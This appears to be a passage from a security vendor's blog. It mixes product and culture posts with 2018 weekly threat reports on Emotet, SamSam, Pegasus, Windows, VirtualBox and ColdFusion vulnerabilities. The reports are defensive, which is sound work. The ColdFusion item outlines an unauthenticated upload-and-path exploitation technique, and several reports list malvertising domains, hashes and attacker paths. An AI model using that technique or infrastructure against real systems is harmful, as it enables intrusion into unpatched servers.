One thing that helps a lot before you embark on the setup process, is making sure you have a solid asset management list that documents all the machines that are supposed to be on your network (#1 on the SANS 20 Critical Security Controls). Make sure you document their MAC address and their static IP (if you want to give them one or if they have one pre-configured). Most ISP supplied modems will have their own subnet DHCP pool that’s pre-defined, and their modem will have a static IP assigned on that subnet outside of the DHCP range. I highly recommend giving your switch and access point a static IP address as well and assigning your DHCP range to not include those addresses. Personally, I also give some devices (such as my Xbox One) a static IP for many reasons. One of which is to make the network as fast as possible for pwning n00bz on Xbox Live.

I could go over all the specifics of how easy it is to install the TFF sensor, but why re-invent the wheel when anything I would put here has already been extensively documented in our help pages. There you should find any additional information you could possibly need to get yourself setup. Of course, we don’t have a problem with hopping on the phone with you to help you get it figured out if you need some assistance. But I believe in your ability to do it yourself.

Now you’re ready:

The great thing about what we offer here at Perch is the fact that you don’t have to be an expert to be able to get us setup on your network, nor do you have to have a full security team to triage the alerts that our sensor generates. We’ve taken care of all that for you. Between our great, service-oriented Customer Success team, and our extensive documentation on how to get setup and running, you’ll wonder how you ever lived your life without us to begin with.

Get flocked up!

Here at Perch, we try to make security easy, because it’s already hard enough. If it’s this easy for the little guys, just imagine how painless it will be if you’re an MSP trying to manage multiple small organizations, or if you’re a bigger shop with lots of remote locations you need to monitor. Our solution is applicable for a wide variety of use cases. We look forward to hearing from you about how we can work with you to help you address your security needs.

Join the flock

Threat Report Friday November 30th 2018

on November 30, 2018

Welcome back. I don’t know if you celebrated the largely known U.S. holiday of Thanksgiving, but I did; and I’m grateful I had the week off. We’ve been keeping our ear to the ground. This week we want to tell you about an Emotet malspam campaign that cashed in on Black Friday, an indictment announced for the authors/distributors of SamSam ransomware, and a serious threat to journalists in Mexico.

Emotet Cashes in on Black Friday

You weren’t the only one shopping on Black Friday. ESET researchers found evidence of a large Emotet campaign occurring on Black Friday. Like prior campaigns, Emotet was distributed via spam. In this campaign, the attachments and links are to XML files with .doc extensions instead of DOC or PDF files.

Emotet is known to distribute various banking malware families known for stealing passwords, credit card details, and access to crypto-currency wallets. The United States is one of the top five targeted countries, while the UK and South Africa are in the top ten. Since this campaign was focused on Black Friday, it’s safe to say it was targeting U.S. shoppers getting ready to check their bank balance and do some online shopping.

Catch me if you SamSam

The chase is on for two Iranian nationals charged by a U.S. federal grand jury, following a 34-month long international computer hacking and extortion scheme. Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27) face a total of six counts alleging that they authored and deployed SamSam ransomware to more than 200 victims, including hospitals, municipalities, and public institutions. The counts are as follows: one count of conspiracy to commit wire fraud, one count of conspiracy to commit fraud and related activity in connection with computers, two substantive counts of intentional damage to a protected computer, and two substantive counts of transmitting a demand in relation to damaging a protected computer.

In the Department of Justice Indictment, two individuals, Exchanger 1 and Exchanger 2, are labeled in the Relevant Individuals and Entities section. In a U.S. Department of Treasury press release also published on November 28, 2018, Ali Khorashadizadeh and Mohammad Ghorbaniyan, are named as the financial facilitators in a malicious campaign involving SamSam ransomware. The press release states that they, helped exchange digital currency (Bitcoin) ransom payments into Iranian rial on behalf of Iranian malicious cyber actors.

According to the indictment, beginning in December 2015, the offenders reportedly accessed victim computers without authorization through security vulnerabilities. They then installed and executed SamSam, resulting in the unauthorized encryption of data on the victims’ computers. A Bitcoin ransom was demanded in exchange for decryption keys for the encrypted data. Collecting ransom payments from victim entities that paid the ransom and exchanging the Bitcoin proceeds into Iranian rial using Iran-based Bitcoin exchanges. The indictment alleges that the pair earned over $6 million USD in ransom payments to date and caused over $30 million USD in losses to victims.

Journalists Targeted with Mobile Malware After Cartel Journalist Gunned Down

Journalists in Mexico have faced some very real threats recently, and they can add nation-state level mobile spyware to the list. Somehow, peers of a journalist likely killed by a cartel, are being targeted with nation-state level mobile malware. Something strange is going on here.

Citizen Lab published the seventh report in a series detailing abuse of NSO Group Pegasus Spyware. Citizen Lab and partners have identified a total of 24 cases of abusive targeting by Mexico-linked NSO Group customers. Infection attempts are located in Canada, Mexico, the UAE, the United Kingdom, and the United States.

Pegasus is a sophisticated tool for spying on mobile phones and is exclusively sold to governments for the purposes of fighting terror and investigating crime. According to NSO Group, in the past two years, Pegasus had been used by repressive governments to spy on human rights defenders, journalists, and others who they deem as threats to their power.

In Citizen Lab’s most recent findings, they disclose an attack that occurred in May 2017. Journalist Javier Valdez Cárdenas was gunned down near his office. Shortly after the murder, Cárdenas’ colleagues, Andrés Villarreal and Ismael Bojórquez received suspicious messages saying, Cárdenas’ killers had been identified. The messages contained a malicious link that, once clicked, downloaded NSO spyware onto their mobile devices. Users and organizations should exercise caution when viewing messages from foreign or unknown senders. The malicious URLs are contained within the report.

Sharing Intel

on November 27, 2018

Share intel back to your community through a clean user interface. Perch CISO Wes Spencer shows you how.

Preventing Burnout

on November 20, 2018

In software especially, we lose more talented, hard-working folks to burnout than almost anything else. People who love their job and feel rewarded for doing it almost always stay. However, the tech industry is fast-paced, labor intensive, and the projects are seemingly endless.

The question remains, how can we stop treading proverbial water and get a healthy, positive outlook on our work life?

Make a list

If you do more things than you can count in a day and struggle to remember any of it, you need a list. Often times we feel the most stressed when we are feeling overwhelmed, and yet we still guilt ourselves for not doing enough. There will always be more to do in our ever-connected, feedback-driven world; especially in the tech industry.

By making a list of what you plan to do and crossing it off as you go, you have something to look back at and say, “wow, I really did get a lot done today”. This creates a positive feedback loop in your brain. Ending every day on a high note can make you more positive and less likely to imagine greener pastures elsewhere.

For my list, I like to use the Productivity Planner, but some folks love the Bullet Journal, and others like good ol’ fashioned legal pads.

If you are too cool for an analog list (even though crossing stuff off is way more fun than tapping an app), you can do the same thing with the Reminders app on your phone or a tool like Asana or Todoist.

Agile methods

There’s a lot written on agile, so I won’t go into the details here. The key takeaways for any project are as follows:

  • Break your project into bite-sized chunks
  • Pick a few of those bite-sized chunks and set a regular deadline (every week or two, usually called “sprints”)
  • Track your work as you do it
  • When your sprint is over, celebrate all the hard work you did
  • Rinse and repeat – learn from your mistakes and try to do a little better every sprint

This applies to software, home improvement, getting into shape, you name it.

If you never celebrate the work that you’ve done and never take a moment to breathe, you would feel endless, daunting, and - you guessed it - leads to burnout. If you have a big project in front of you, try being agile and see what happens.

Taking breaks

This should go without saying but… take a break. Seriously.

I’m not talking about a three-day weekend every other month. Take at least three days during the week and incorporate doing something you love; whether that is traveling or immersing yourself in a new video game.

Oh, and while you’re at it…

Turn your phone off, hide your laptop, and throw your pager in a river (if you still have one). Flipping the switch from ‘always-on’ to ‘off’, and taking a real vacation has a significant impact on your happiness. How can you really enjoy a camping trip if you are checking Slack? Or, how can you spend quality time with your family if you are surfing Reddit?

Distance makes the heart grow fonder, and you have a long, necessary relationship with your job. Take a break, write it a postcard, and be ready to jump back in on Monday.

Daily routines

One of the best tools we as humans have for creating a sense of stability and safety are routines. If you constantly struggle and feel like a uniquely chaotic snowflake, then establishing a few routines can add a sense of normalcy and familiarity no matter what pops up on your calendar.

Good morning, sunshine

Start by establishing a morning routine, whether it be a cup of coffee in your favorite chair or quick workout if you’re the active type. Starting your day with a little thing just for you can put you in a good mood before clocking in. Try to avoid distractions like Facebook or your inbox before doing something you love.

Time to eat

It may seem like you always have to push out your lunch till 3:00 p.m. or skip it all together, but do you? Taking time to eat is the healthy thing to do. Especially, if you are the hangry type. Making the time to eat may just save you from being a grumpy cat to everyone you come in contact with that day.

Don’t be a grumpy, hangry cat. Block out lunch on your calendar, and if someone double-books you, politely ask if there’s a better time to meet. Your stomach, and probably your whole team, will thank you later.

Lights out

Before crawling into bed, consider shutting off all electronics an hour beforehand. Some studies suggest blue light can decrease melatonin production and lead to a lower quality of sleep. I also recommend taking a moment for yourself and establishing another routine that makes you happy. You could put on an album you love, dive into a book with your kids, or give yourself a few minutes to doodle. Giving yourself a chance to genuinely relax before sleeping helps you sleep better and wake up ready to tackle the next day.

I like to start and end my day with the 5 Minute Journal, but my sister prefers a coloring book.

Find your happy

This article is full of tips and tricks, but the most important thing is to find what works for you.
Take time to figure out what makes you happy and do more of that.

Release Notes

November 16, 2018

  • Add a placeholder community for ConnectWise
  • Add more information to ConnectWise payload
  • Sign up as an MSSP
  • Allow for filtering Security Events by date
  • UI for integration with ConnectWise
  • Sort IPs in a user-friendly way

  • Fix bug with subnets not displaying on alerts
  • Fix indicator history not loading
  • Fix status change emails not sending
  • Fix personal vs public comments
  • Kill long-running queries
  • Fix index deletion script

Threat Report Thursday November 15th 2018

on November 15, 2018

Holy moly, it’s the weekly threat report. This is your gentle reminder to patch all the things. That’s the theme for this week, vulnerabilities that need patching and a sprinkle of attack tools.

Microsoft Patch Tuesday

In past reports, we’ve discussed pending 0-days for Edge and Windows; and it looks like some similarly critical vulnerabilities are being patched this week. This Tuesday’s Microsoft patch covered a pair of 0-day vulnerabilities, ten other critical items, and around 50+ other issues. Let’s review a few of those.

One of the vulnerabilities being actively exploited in the wild is a Win32k privilege escalation. CVE-2018-8589 has been found in the wild on Windows 7, Windows Server 2008, and Windows Server 2008 R2 systems. However, an attacker needs to be authenticated to the system to exploit the vulnerability and gain full control. Another critical patch was for CVE-2018-8584, which was disclosed in October and impacts Windows 10, Windows Server 2016, and Windows Server 2019. When exploited it allows unauthorized users to access and delete files on systems that are normally only accessible by admins. This could open the door for DLL hijacking and other attack vectors that would allow for privilege escalation.

Also included were five vulnerabilities in the Chakra scripting engine behind Microsoft Edge (CVE-2018-8551, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557, and CVE-2018-8588). Any of these CVEs could be leveraged to execute code on an Edge user’s host. To be exploited, the Edge user would have to be naively phished or innocently malvertised. Remember, malvertising is on the rise. If an attacker chained together an Edge exploit with either of the vulnerabilities that allow for privilege escalation, they could gain full control of the host.

Other notables included two remote code execution flaws in Word (CVE-2018-8539, CVE-2018-8573) and PowerShell bugs that allow potential remote code execution (CVE-2018-8256, CVE-2018-8415).

Data Privacy Plug-in Ironically Eliminates Privacy for Thousands of Sites

Last week a privilege escalation vulnerability in a popular WordPress GDPR compliance plugin with over 100K installs. This week, thousands of websites have been compromised. If you’re running a WordPress site, check your GDPR plugin for updates, because they are scanning everyone. The patched version is 1.4.3.

Although these sites are fully compromised, Sucuri has been tracking a campaign and reports observing thousands of compromised sites that direct the user to code similarly used to invoke fake tech support scams (TSS). We confirmed with Perchy, the TSS campaign is currently using wtools[.]io to host the injected content and redirecting users to diwutixip[.]innocraft[.]cloud for the TSS payloads.

China Chopper Finds Forever Home with ColdFusion

Security researchers have recently observed active exploitation of a newly patched vulnerability in Adobe ColdFusion. A suspected Chinese APT group was able to compromise a vulnerable ColdFusion server by directly uploading a China Chopper webshell. Adobe’s ColdFusion has historically been a major target of APT groups looking to compromise networks. Modern versions of ColdFusion include the WYSIWYG rich text editor CKEditor. When Adobe decided to replace FCKeditor with CKEditor, they inadvertently introduced an unauthenticated file upload vulnerability. The vulnerability is easily exploited through an HTTP POST request to the file “upload.cfm”, which is not restricted and does not require authentication. It should be noted that ColdFusion does attempt to restrict the file types that are allowed for upload via CKEditor in a configuration file called “settings.cfm”. Researchers have identified that Adobe did not include the “.jsp” file extension in the default configuration, which was problematic because ColdFusion allows “.jsp” files to be actively executed.

The attackers also identified a directory modification issue through the “path” form variable that allowed them to change the directory to where uploaded files would be placed. This means that even if the .jsp file extension had been on the block list, the attackers could have placed another script or executable file somewhere on the system in an attempt to compromise it. All files on the compromised websites were found in one of two directories; /cf_scripts/ and /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/. Several of the affected websites contained an HTML index file from the hacktivist group, “TYPICAL IDIOT SECURITY”.

On September 11, 2018, Adobe issued security bulletin APSB18-33, which fixed a variety of issues to include an unauthenticated file upload vulnerability. This vulnerability was assigned as CVE-2018-15961 affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). You should apply a patch once it is available from Adobe.

We observed potential recon activity from:

JexBoss Gets Wild with NCCIC

Finally, to close out this threat report, we have a tool getting the spotlight from The National Cybersecurity and Communications Integration Center (NCCIC). NCCIC issued a US-CERT alert for security assessment tool. JexBoss is used to test and exploit older vulnerabilities in Java applications and platforms, including the JBoss AS/WildFly web server framework. The Github repo hasn’t been updated in two years and there are open issues fix bugs and to add new attacks. It amazes me that older versions of this software is still out there, unpatched and living its best life.

Attackers used JexBoss in the Samsam ransomware campaign that targeted the healthcare industry. According to US-CERT, JexBoss allows an attacker to execute arbitrary OS commands on the target host through either installing webshell, blindly injecting commands, or establishing a reverse shell. NCCIC has determined that JexBoss operates on all seven stages of the Cyber Kill Chain framework. Users and administrators are advised to review AR18-312A from US-CERT.

Thinking in Webhooks

on November 13, 2018

Webhooks have come a long way from a concept first discussed back in 2007, to a commonly used pattern that helps power the apps and services you use daily. We have recently rolled out webhooks for Perch Security, so it seemed fitting to explain what webhooks are, the benefits of using them, and how you can start using webhooks in Perch today.

What are webhooks?

A webhook is a HTTP POST request that is sent to a user configured URL in response to some sort of event that has occurred. There is no formal definition or specification for webhooks, so implementations do vary; but a webhook usually consists of an HTTP request that is triggered by an event and sent to a user-defined URL. Examples of webhook-based products you may already know, or use include Zapier and IFTTT.

Benefits of adding webhooks to a service

  • They allow for real-time, event-driven interactions for customers in everything from APIs to apps.
  • Can be used as part of an internal architecture to process events quickly, as where older architectures may have used a combination of cron jobs and database queries to do batch updates.
  • They allow for simplified architecture – you and your customers can consume the same hooks and act on them differently. Code them once and use them over and over again.
  • Customers are able to integrate and extend your product without needing to do any additional product development.

Using webhooks with Perch

In our efforts to help you and your team *thrunt more effectively, we’ve added (limited) webhook support to Perch. To try it out, head over to the Organization Settings page and select “Webhooks” from the integration section. This iteration includes a webhook that will fire every time an alert is created for your team. As we identify more events that are key to Perch and our customers, we will add more webhooks. We look forward to hearing how our customers use these new webhooks as part of their workflow.

*thrunt (verb) - To hunt cyber security threats - “Jeremy really knows how to thrunt!”

IT Nation 2018 drills into managed security opportunity

November 12, 2018

At the IT Nation 2018 conference, ConnectWise CEO Arnie Bellini bid attendees to embrace the fast-growing managed security market and abandon their generalist approaches.

Read the full article here.

Threat Report Thursday November 8th 2018

on November 8, 2018

In this week’s threat report we’re covering a couple 0-days, malware that could have you scrambling for your disaster recovery (DR) plan, and the rising trend of malvertising. Let’s get it goin’.

Full Disclose for VirtualBox 0-Day

Speaking of 0-days, Security researcher Sergey Zelenyuk has publicly disclosed a 0-day in virtual machine software VirtualBox without notifying Oracle, the developer of the free application. The flaw relies on a chain of bugs and can allow maliciouscode to escape the VirtualBox environment (guest) and execute on the underlying (host) operating system. Zelenyuk highlights that attackers can use many of the already known privilege escalation bugs to gain kernel-level access (ring 0). The flaw affects VirtualBox 5.2.20 and prior versions and impacts any host OS or guest OS with a VM configuration in the default setting. Zelenyuk has published a video demonstrating the attack as well as a detailed technical write-up on Github, viewable in the Validation URL section of this note.

No patches are currently available. In the meantime, Zelenyuk advises users to change the network card of their virtual machines to either PCnetor Paravirtualised Network. If this cannot be done, users should change the mode from NAT to another one. However, the first option is more secure, he adds.

Zelenyuk shared that his reasoning for publishing the 0-day without notifying Oracle first stemmed from personal frustration at how long it takes for patches to be produced and implemented, as well as issues submitting flaws to bug bounty programs. If Zelenyuk has found this, then chances are someone else has too and we are more secure by knowing about this vulnerability than by being unaware of it. Thanks, Zelenyuk. Very pragmatic.

Crypto-jacking Malware forces 3-Day St. Francis Xavier University Network Outage

According to a statement released on November 4, 2018, St. Francis Xavier University in Nova Scotia, Canada was forced to shut down its entire network for at least three days as system administrators attempted to root out a crypto-jacking (or cryptocurrency mining) malware. The attack reportedly began on Thursday, November 1, and targeted the university’s network infrastructure. After the malware was detected, the school immediately shut down its entire network, disabling all online systems including: online courses, cloud storage, email services, debit transactions, and Wi-Fi. The statement reads, “The malicioussoftware attempted to utilize StFX’s collective computing power in order to create or discover Bitcoin for monetary gain.” The statement emphasized that there is no evidence to indicate that personal or sensitive data was compromised by the malware attack. Although no sensitive data was compromised, that was just luck. Ransomware does not typically try to exfiltrate data. Had they been infected with malware that sought to exfiltrate sensitive data, we would see a data breach here instead of an outage. As a safety precaution, university officials advised all students, staff, and faculty to reset their university account passwords as a safety measure; but the university should have forced a password reset.

Disk Cryptor Leveraged by Ransomware Campaign

Another type of malware that could send you into full on DR is ransomware. MalwareHunterTeam has recently discovered new ransomware that installs Disk Cryptor to infect victim machines. Disk Cryptor is an encryption program that encrypts the whole disk and then prompts the user to enter a password on reboot. According to MalwareHunterTeam, this ransomware requires a password argument to be passed. This argument is the decryption key. It is possible that the attackers are hacking into Remote Desktop Services and installing the ransomware manually. During the installation process, a log file will be created at C:\Users\Public\myLog.txt that shows the current stage of the encryption process. Once the entire drive has been encrypted, it will reboot the computer and victims will be greeted with a ransom note that explains to contact mcrypt2018@yandex.comfor payment instructions. It is essential that you have reliable and tested backups of data that can be restored in the case of an emergency, such as a ransomware attack. There is a very narrow window to catch ransomware before it encrypts the disk. If this really is coming in through Remote Desktop Services, it’s way more likely to be a weak password than a 0-day. But, please question if you need RDP open to the world.

Related Registry Keys




- 4ae71336e44bf9bf79d2752e234818a5
- f1d81ae5a4ea7a71d5d7147565fecca141a8e03148ef3c9e7583b9159923d17a

Rising Malvertising Opens Gateway for 0-Days

Based on the ad related traffic before this activity, we believe this is likely related to malvertising. Malvertising is the common ground where evil marketing teams and hungry blackhats meet to perform ritual sacrifice on end users. No matter how well you train staff, if they are allowed to get on the Web, they will get ads. Ads are ubiquitouson the Internet. We are all at risk when adversaries can replace a benign, normal, soul-sucking ad with a maliciousone. We’ve been watching a large number of our customers’ users getting pop-ups for fake tech support scams that goes like, “You have been infected with Pornographic Malware please call the number on the screen or we will report you to the police.” We aren’t sure who picked up the phone and called, but we wanted to let everyone know so they can block the sources of the activity. We’re seeing this campaign across approximately 15 percent of our customer base and it does not appear to target one industry more than another. This is just a fake tech support scam. Imagine if an attacker used malvertising to distribute a new Edge 0-day instead.

Researchers recently discovered a 0-day remote code execution (RCE) vulnerability in Microsoft Edge. In a tweet posted November 1, 2018, exploit developer Yushi Liang tweeted, “we just broke #Edge, teaming up with [Alexandr Kochkov] for a stable exploit, brace yourself SBX is coming.” The tweet included an image of the Web browser that appeared to launch the Windows Calculator app. Liang and Kochkov’s objective was to develop a stable exploit and achieve full sandbox escaping of the code. The pair disclosed that they were also looking for a method to escalate execution privileges to SYSTEM, granting them complete control over the victim machine. Liang shared that he discovered the 0-day bug with the assistance of the Wadi Fuzzer utility from SensePost. The pair plans on publishing a proof-of-concept demonstrating the vulnerability soon. We’ll let you know when they do.

Until then, here are some domains to block. If you want the IPs hit me up on Slack. To see if your users got hit by this malvertising campaign, check out Perchybana:,pause:!f,value:0),time:(from:now-30d,mode:quick,to:now))&_a=(columns:!(perch_company_name,event_type,src_ip,src_port,dest_ip,dest_port,payload_printable,flow.bytes_toclient,flow.bytes_toserver,http.hostname,http.url,http.http_refer,http.status,http.redirect,http.xff,http.protocol,fileinfo.filename,fileinfo.sha1,fileinfo.size),index:'*-records',interval:auto,query:(query_string:(analyze_wildcard:!t,query:'(%22%2Ftpage3%2F%22%20%7C%7C%20%22%2Fwelcome%2F%3Fa%3D%22)')),sort:!(timestamp,desc))


- - Organization: DigitalOcean, LLC (DO-13)
- - Organization: DigitalOcean, LLC (DO-13)
- - Organization: DigitalOcean, LLC (DO-13)
- - Organization: DigitalOcean, LLC (DO-13)
- - Organization: DigitalOcean, LLC (DO-13)
- - Organization: Centrilogic, Inc. (CENTR-60)
- - Organization: DigitalOcean, LLC (DO-13)
- - Organization: DigitalOcean, LLC (DO-13)
- - Organization:  US-DIGITALOCEANLLC-20100303
- - Organization:  UK-MASSIVEGRID-20131231
- - Organization: Hostwinds LLC. (HL-29)
- - Organization: Jack Henry & Associates, Inc. (JHA-1)
- - Organization: PSINet, Inc. (PSI)
- - Organization: PSINet, Inc. (PSI)
- - Organization: PSINet, Inc. (PSI)
- - Organization: NOC4Hosts Inc. (NOC4H)
- - Organization: NOC4Hosts Inc. (NOC4H)


- /fonts/glyphicons-halflings-regular.ttf
- /fonts/glyphicons-halflings-regular.woff
- /fonts/glyphicons-halflings-regulard41d-.eot
- /tpage3/a.htm
- /tpage3/gb.mp3
- /tpage3/iframe.js
- /tpage3/jquery-1.js
- /tpage3/login.php
- /tpage3/retreaver.js
- /welcome/?a=AZ&pagex=1&s1=[campaign id]%2C%2C&os=[operating system]&browser=[browser name]&isp=[internetservice provider]&ip=[public ip]&geo=[geo ip code]&q1=[string]%2C
- /tpage3/?a=AZ&pagex=1&s1=[campaign id]%2C%2C&os=[operating system]&browser=[browser name]&isp=[internetservice provider]&ip=[public ip]&geo=[geo ip code]&q1=[string]%2C


- 69db1a94309e88008bbadacf301526edce59374410c83f888ec866ad6b2d8e47- iframe.js
- 71a861100e206eeee88876cd5313553e0fdc07046cce33a1a96b96d9485070e1 - retreaver.js


- ganglioblast[.]pw
- gathering[.]pw
- gaultherin[.]pw
- glycolysis[.]pw
- haematoscope[.]pw
- haemoglobin[.]pw
- hemizygote[.]pw
- hemocyanin[.]pw
- hidradenomas[.]pw
- hologamies[.]pw
- holographies[.]pw
- homeopathies[.]pw
- homoeotic[.]pw
- homogeneous[.]pw
- homogeniser[.]pw
- homolytic[.]pw
- junaket[.]us
- kremlins[.]pw
- laudably[.]pw
- leafless[.]pw
- mannikin[.]pw
- massaged[.]pw
- metamers[.]pw
- ministrytwo[.]stream
- minusnine[.]stream
- misatone[.]pw
- misbills[.]pw
- misdeeds[.]pw
- misdoing[.]pw
- misdraws[.]pw
- misjoins[.]pw
- mislearn[.]pw
- misspent[.]pw
- mistrust[.]pw
- miterers[.]pw
- modified[.]pw
- monazite[.]pw
- monitive[.]pw
- monotony[.]pw
- mustered[.]pw
- mutating[.]pw
- muteness[.]pw
- nailfold[.]pw
- news[.]hellosite[.]info
- sp[.]cwfservice[.]net
- swiftone[.]us
- tellinglynine[.]us
- torousten[.]pw
- trivetnine[.]pw
- turgitefour[.]pw
- unearthsix[.]pw
- unkindnine[.]pw
- unlockten[.]pw
- unmetsix[.]pw
- unplaittwo[.]pw
- unplugfive[.]pw
- unresttwo[.]pw
- unretireten[.]pw
- untunedone[.]pw
- upraiseten[.]pw
- usheredfour[.]pw

A Day in the Life: Sales at Perch Security

on November 6, 2018

They say, “time flies when you’re having fun”. This couldn’t ring more true as I look back on my time here at Perch Security. The day before Halloween was my first day on the job. It just so happened to be costume day here in the office. Words in this blog post do no justice to what my eyes saw that day. I knew right then, I made a great choice by joining this company.

Trekking through the cybersecurity sales landscape

Working sales in the #cybersecurity space can prove to be cumbersome. There can be confusion amongst customers regarding the various products in the market. Customers may think they are protected but may not be using the right setup for their #security stack. One layer of security that proved to be efficient years back may now be outdated, and therefore useless today. The sales rep must be ‘in the know’ and educate the potential consumer on market trends and best practices. This is why Perch Security was built; to stay true to what we see and hear in the industry. We offer a user-friendly service to the masses. I like to call it a “peace of mind” service. I’ll explain.

Perch Security automates the threat feeds you subscribe to. However, we do not stop there. We take it a step further. Perch offers around the clock highly trained security analysts to threat hunt for you. Ultimately, freeing up your day to focus elsewhere. I think our approach is why we are seeing so much success. Not to mention, we do it at such an affordable cost that it makes my job selling a heck of a lot easier!

Keep your eyes on the prize

It goes without saying that there is never a dull day here at Perch Security. Make sure to stay tuned for future product enhancements. We are constantly taking the feedback from our customers and building on what we hear. With the ever-changing cybersecurity market, you must think ahead. The issues you are facing today may not be what comes at you tomorrow.

As we continue to pick up speed and expand in the market place, I’ll have to stop and think to myself about how we got here, where we are at, and where we are headed. Sometimes it’s the journey that teaches you a lot about your destination.

Release Notes

November 2, 2018

  • Comments: Default to private for new comments
  • Communities: Intel471 added
  • Integrations: ConnectWise MVP integration
  • Support: Convert LinkHigh to MSSP

  • Deps: Resolve failing builds for foundation-emails dependencies
  • Performance: Disable map sightings endpoint to conserve data and time

  • ConnectWise MVP integration demoed and deployed to QA
  • Intel471 community addded to PROD
  • All new indicator comments are private by default

Threat Report Wednesday October 31st 2018

on October 31, 2018

It’s time to rise from your graves for our Halloween threat report. This week we’re going to point you at a few Twitter doors to knock on, hand out some zero-day tricks and treats, and discuss a white paper that’s giving energy and water a fright.

Zero-Day Tricks and Treats

Many security professionals get their news through sources like Twitter. If you’re looking for some Twitter doors to knock on to get the good treats this Halloween, check out @SandboxEscaper and @HackerFantastic.

In recent months, security researcher @SandboxEscaper has released proof-of-concept(PoC) exploits for two Windows zero-days on Twitter. The most recent vulnerability is a privilege escalation flaw in Microsoft Data Sharing (dssvc.dll). The Data Sharing Service runs as LocalSystem account and provides data brokering between applications. @SandboxEscaper zero-days have been turned around by threat actors and seen in the wild. If you want some early warning on the next Window’s zero-day, give her a follow.

On the Linux side of the world, security researcher Narendra Shinde discovered a local privilege-escalation and file-overwrite vulnerability in X.Org X server that opens the door for a trivial compromise of a Linux system.

Essentially, Shinde says this is the result of “incorrect command-line parameter validation”. The system doesn’t check for correct permissions on the -modulepath or -logfile command line switches. Both are root-privileged processes.

Although this was only given a 6.6 CVE score (likely because it was considered a local exploit) security pro @HackerFantastic has released a PoC on Twitter that shows this working remotely via SSH. This makes CVE-2018-14665 a dime in my little black book.

“Xorg Local Privilege Escalation (LPE) via CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with three commands or less”. @HackerFantastic regularly posts PoCs and other good security news. You should give him a follow too.

Spectre of Spectre Returns to Haunt Halloween

Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) have reported an industry-wide issue found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). The vulnerability relies on the presence of a precisely-defined instruction sequence in the privileged code. As well as the fact that memory read from address to which a recent memory write has occurred may see an older value. Subsequently this will cause an update into the microprocessor’s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. This impacts the qemu-kvm and libvirt packages.

Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.

The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.

This reminded us of the OG speculative execution vulnerability, Spectre, disclosed Jann Horn and Paul Kocher in collaboration with Daniel Genkin, Mike Hamburg, Moritz Lipp and Yuval Yarom.

Water and Energy Industrial Controls Exposed on the Web

Trend Micro has recently published a white paper on water and energy infrastructure exposed to the Internet, and it’s worth a read. Trend Micro reports that Energy is the top critical infrastructure for most industrial economies and Water is a natural extension of the energy sector; with water being a key component in hydroelectric and geothermal plants. Protecting critical infrastructure against cyber attacks should be of the highest priority for the organizations that operate it.

Perch provides threat detection services to a number of Critical Infrastructure providers in the Water and Energy space. We looked for some of the common exposed services mentioned in this white paper. After reviewing all customer data for the last 30 days we found no established flow from the wild Web to a port related industrial control systems. Good job, Perchy people. You get a treat.

The New Era of Service

on October 30, 2018

Adapting to new work environments is never easy, especially to one that’s always in flux: Technology. As a newbie to the biz, one of the first things I learned to appreciate was how focused the market was on succeeding. Not only in terms of financials but recognizing that the victory of any SaaS stems from one quintessential metric – the success story of their clients.

What Makes Customer Success Special?

The Customer Success Department (CS) of any company is a relatively new creation and has quickly proven to be essential for start-ups. If end-users only see ROI and feel they aren’t supported, why would they stay? The answer is: by the time you’ve thought of this, they are gone; with or without warning. Facts are facts. The current year 2018 (err 19) is light years past the glory days when big business smoked stogies and chugged bourbon mid-day barking demands and convincing clients they ‘needed’ them based solely on their brassy conviction. We talk. We post. We share information in real-time. Everything is public and it’s far past time customers are given the respect their hard-earned money deserves. It’s time to say “Goodbye” to the Salesman and say “Yassss” to the #SuccessMan.

As a SaaS we recognized early on that the sustainability of our company derived from our client’s satisfaction. In the realm of cybersecurity there are no Amazon Reviews, but our segment is so tight and niche that there isn’t a need. Sentiments travel faster than I’m frantically typing this blog minutes before it’s being posted. Literally Friday afternoon – going live at five (Don’t mind tha typos’).

The Who’s Who of Customer Success

Gary Dobkin, Director of Operations at Perch Security, not only recognized the importance of client satisfaction, he sought out the best route to attain it. Being the self-aware savant that he is, Mr. Dobkin knew he needed the big guns. Enter Onboarding and Provisioning directly under the care of CS, a unique twist that he guarantees to be the ride of a life time.

Once a prospective client passes through the Heavenly Gates into Flock life, the Perch Security team works tirelessly to make sure any question, comment, concern, or squawk does not go unaddressed. Placing our clients at the forefront of our business has proven itself to be one of our many unique characteristics, as is our Marketing and secret obsession with the 8th Wonder of the World – Skyline Chili. Open communication and customized care regiments fuel the CS Department (as does sugar free Red Bull, Kombucha, and pork rinds).

What does all of this even mean?

The moral of this rant is not to boast. It’s not to prove I can form complete sentences, fragments, or make you laugh. It’s merely to convey the passion I have witnessed and have organically become one with. Perch Security provides so much more than a secure network. Our clients (comrades) can trust in the support of our army made of real-life angry birds. Everyone that works here makes up our CS Department and we all want the best for you, your coworkers, your employees, and most importantly YOUR end user – your clients.

It’s time to say “Goodbye” to crossing your fingers and hoping for the best. Facebook, British Airways, and LinkedIn didn’t expect a breach, but it happens. We are committed to your security and want to take the burden of a breach off your shoulders. Perch Security is bright eyed, and bushy tailed 7 days a week, 24 hours a day, 365 days a year so you don’t have to be. Your peace of mind is what we give a FLOCK about.

Threat Report Thursday October 25th 2018

on October 25, 2018

As we approach Halloween, it has been a frightening week in security. We have an ancient Zero-Day rising from the shadows, government data being sucked dry by a data breach, and monstrous malware kidnapping your codes. Don’t get spooked!

Cashdollar Hits Jackpot with Discovery of 8-year-old Zero-Day

